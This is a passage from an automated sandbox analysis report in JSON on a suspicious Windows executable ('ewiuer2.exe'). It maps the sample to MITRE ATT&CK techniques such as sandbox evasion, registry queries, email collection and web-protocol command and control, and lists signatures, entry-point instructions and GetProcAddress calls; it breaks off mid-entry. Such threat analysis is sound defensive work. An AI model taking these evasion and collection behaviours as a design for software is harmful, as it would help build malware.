"attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"ewiuer2.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74B50000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74710000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"ewiuer2.exe\" touched \"NetworkListManager\" (Path: \"HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")\n \"ewiuer2.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\")\n \"ewiuer2.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\")\n \"ewiuer2.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ewiuer2.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"EWIUER2.EXE.67A482B6.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\teax, 0x1800,call\t0x40d5a0,push\tebx,push\tesi,push\tedi,mov\tedi, dword ptr [0x40e0ac],mov\tesi, 0x400,push\tesi,lea\teax, [ebp - 0x800],push\teax,xor\tebx, ebx,push\tebx,call\tedi,push\t0x40f4fc,lea\teax, [ebp - 0x800],call\t0x405493,test\teax, eax,pop\tecx,je\t0x40b3cf,push\tesi,lea\teax, [ebp - 0x800],push\teax,push\tebx,call\tedi,push\t1,lea\teax, [ebp - 0x800],push\teax,push\t0x40f414,push\t0x40f1f0,push\t0x80000001,\"\n \"ewiuer2.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\teax, 0x1800,call\t0x40d5a0,push\tebx,push\tesi,push\tedi,mov\tedi, dword ptr [0x40e0ac],mov\tesi, 0x400,push\tesi,lea\teax, [ebp - 0x800],push\teax,xor\tebx, ebx,push\tebx,call\tedi,push\t0x40f4fc,lea\teax, [ebp - 0x800],call\t0x405493,test\teax, eax,pop\tecx,je\t0x40b3cf,push\tesi,lea\teax, [ebp - 0x800],push\teax,push\tebx,call\tedi,push\t1,lea\teax, [ebp - 0x800],push\teax,push\t0x40f414,push\t0x40f1f0,push\t0x80000001,\"\n \"EWIUER2.EXE.67A482B6.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\teax, 0x1800,call\t0x40d5a0,push\tebx,push\tesi,push\tedi,mov\tedi, dword ptr [0x40e0ac],mov\tesi, 0x400,push\tesi,lea\teax, [ebp - 0x800],push\teax,xor\tebx, ebx,push\tebx,call\tedi,push\t0x40f4fc,lea\teax, [ebp - 0x800],call\t0x405493,test\teax, eax,pop\tecx,je\t0x40b3cf,push\tesi,lea\teax, [ebp - 0x800],push\teax,push\tebx,call\tedi,push\t1,lea\teax, [ebp - 0x800],push\teax,push\t0x40f414,push\t0x40f1f0,push\t0x80000001,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003168)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter BCryptGenRandom (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetRngInterface (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a 